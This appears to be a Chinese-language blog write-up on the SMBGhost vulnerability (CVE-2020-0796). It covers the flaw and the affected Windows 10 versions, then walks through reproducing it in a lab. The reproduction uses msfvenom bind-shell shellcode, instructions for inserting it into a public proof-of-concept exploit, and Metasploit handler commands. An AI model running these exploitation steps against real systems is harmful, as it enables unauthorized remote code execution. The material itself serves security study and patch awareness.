CVE-2020-0796-简介
漏洞名称
SMB远程代码执行漏洞(CVE-2020-0796),有安全研究者取名“SMBGhost”。
漏洞类型
远程代码执行
漏洞等级
高危
漏洞描述
微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料,但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。
攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。
该漏洞并未出现在微软3月的例行更新列表,有国外安全厂商意外发布了有关该漏洞存在的消息,随后引发行业关注。
漏洞版本
漏洞不影响win7,漏洞影响Windows 10 1903之后的各个32位、64位版Windows,包括家用版、专业版、企业版、教育版。
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
漏洞复现
准备环境
去msdn下载镜像然后安装系统,由于电脑配置有限,这里我采用NAT,启用一台win10和一台kali,扫描者与受害者都是win10

发现漏洞
通过奇安信的漏洞检测脚本发现存在漏洞:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
解压后可通过附带的文本文件了解软件的使用方式以及漏洞的修复方式,这里直接探测到,148(就是自己)存在相关漏洞

修改exp
通过 MSF 生成 shellcode:(用正向)
msfvenom -p windows/x64/meterpreter/bind_tcp lport=9999 -f py -o shellcode.txt

下载 exp 脚本:
https://github.com/chompie1337/SMBGhost_RCE_PoC.git
把刚刚 MSF 生成的 shellcode.txt 里的 buf 替换成 USER_PAYLOAD

这个时候解压打开下载下来的exp脚本,打开exploit.py,你会发现这个py文件分为上下两大部分,这个时候把修改过的shellcode.txt的内容替换掉py文件下面那堆文件
【这点也是我最想吐槽的,没怎么见有人说,一直迷惑shellcode.txt怎么跟exploit.py文件搞到一块的,查了半天资料才知道。说人话就是:使用MSF生成一段恶意代码,把这段恶意代码的每行开头的buf替换为USER_PAYLOAD,然后把这段修改过的恶意代码,去替换EXP文件中exploit.py中的,USER_PAYLOAD开头的那堆代码】

MSf监听
这个时候 MSF 就可以启动监听了
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.40.148
exploit

开打
如果打一次,MSF没收到会话,就拿python再打一次,有可能能够拿到会话,也有可能win10蓝屏。我的是win10蓝屏,msf没有拿到会话



版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134349.html